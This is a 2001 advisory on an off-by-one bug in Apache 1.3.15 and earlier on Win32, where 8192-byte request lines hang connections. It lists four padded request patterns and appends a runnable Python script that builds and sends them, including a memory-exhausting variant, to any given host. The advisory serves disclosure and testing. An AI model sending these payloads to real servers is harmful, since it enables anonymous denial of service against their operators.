######################################################################

Luigi Auriemma

Application:  Apache webserver
              http://httpd.apache.org
Version:      <= 1.3.15 only on Win32
Bug:          Bad management of URI of 8192 bytes (off-by-one bug)
Date:         12 Apr 2001
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org

######################################################################

1) Introduction
2) Bug
3) The Code
4) Fix

######################################################################

===============
1) Introduction
===============

The bug I show exists only on the Win32 port of the Apache webserver.

######################################################################

======
2) Bug
======

When the Apache server receives 8192 bytes in a request it crashes internally, sends a MessageBox to the administrator and leaves the connection open forever.

The biggest problem is the memory occupation of this attack. In fact, after the GET request of 8192 bytes we can also send another 100 strings of the same size (for example "Accept: " followed by 8182 'A'). In WinNT/2k the attack is more dangerous because the administrator receives a MessageBox for each one of these "long strings".

The last problem is the most dangerous: no entries in the logs. The attacker will be anonymous during the attack, so the administrator can view only the messages and a big list of idle connections.

This is not a buffer overflow, so remote code cannot be executed.

######################################################################

===========
3) The Code
===========

Some examples (each line is exactly 8192 bytes long once the terminating CRLF is counted):

1) GET (8184 of "/") /
2) HEAD /(8182 of "A") /
3) GET (8184 of "/") /
   for 100 times: Accept: (8182 of "/")
4) GET (8177 of "/") HTTP/1.0

######################################################################

======
4) Fix
======

Apache 1.3.16

######################################################################
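The four examples above are easier to reason about once you see that each line is padded so that prefix + filler + suffix + CRLF comes to exactly 8192 bytes (e.g. "GET " = 4, 8184 filler, " /" = 2, CRLF = 2). The script below is an added example for this advisory, not Luigi Auriemma's original proof of concept: it builds the request lines from that rule, so the byte counts are checked rather than typed by hand, and includes a small socket probe. The probe's host and port are assumptions supplied on the command line; it returns whatever the server answers within the timeout, so a server that handles the line correctly replies with an error response (Apache's limit for a request line is 8190 bytes and it answers 414), while one with the behaviour described above stays silent and the connection hangs.

```python
"""Build the 8192-byte request lines from section 3 and optionally send them.

Added example for this advisory; it is not the original author's code.
Host and port are assumptions and must be a test instance you own.
"""
import socket
import sys

LINE_LEN = 8192            # the line length the advisory says the Win32 build mishandles
CRLF = b"\r\n"


def padded_line(prefix: bytes, suffix: bytes, fill: bytes = b"/") -> bytes:
    """Return prefix + fill*n + suffix + CRLF with n chosen so the line is LINE_LEN bytes."""
    n = LINE_LEN - len(prefix) - len(suffix) - len(CRLF)
    if n < 0:
        raise ValueError("prefix and suffix already exceed the line length")
    line = prefix + fill * n + suffix + CRLF
    assert len(line) == LINE_LEN
    return line


def example_1() -> bytes:
    """GET (8184 of "/") /"""
    return padded_line(b"GET ", b" /", b"/")


def example_2() -> bytes:
    """HEAD /(8182 of "A") /"""
    return padded_line(b"HEAD /", b" /", b"A")


def accept_header() -> bytes:
    """Accept: (8182 of "/")  -- one of the 100 header lines of example 3."""
    return padded_line(b"Accept: ", b"", b"/")


def example_3(n_headers: int = 100) -> bytes:
    """Request line of example 1 followed by n_headers oversized Accept: lines."""
    return example_1() + accept_header() * n_headers


def example_4() -> bytes:
    """GET (8177 of "/") HTTP/1.0"""
    return padded_line(b"GET ", b" HTTP/1.0", b"/")


def filler_count(line: bytes, fill: bytes) -> int:
    """Length of the longest run of `fill` in `line` (the "N of X" figure in section 3)."""
    best = cur = 0
    for i in range(len(line)):
        cur = cur + 1 if line[i:i + 1] == fill else 0
        best = max(best, cur)
    return best


def probe(host: str, port: int, payload: bytes, timeout: float = 5.0) -> bytes:
    """Send payload and return the server's reply, or b"" if it says nothing within timeout.

    A server that parses the line correctly answers with an error status; the
    advisory describes the affected build leaving the connection open with no reply.
    """
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(payload)
        try:
            return s.recv(4096)
        except socket.timeout:
            return b""


if __name__ == "__main__":
    # usage: python script.py <host> <port> <1|2|3|4>   (host and port are assumptions)
    if len(sys.argv) != 4:
        sys.exit("usage: %s host port example-number" % sys.argv[0])
    builders = {"1": example_1, "2": example_2, "3": example_3, "4": example_4}
    data = builders[sys.argv[3]]()
    reply = probe(sys.argv[1], int(sys.argv[2]), data)
    print("sent %d bytes, reply: %r" % (len(data), reply[:80]))
```

Example 3 is where the memory cost comes from: 101 lines of 8192 bytes is roughly 800 KiB per connection, and nothing stops the attacker from opening many such connections.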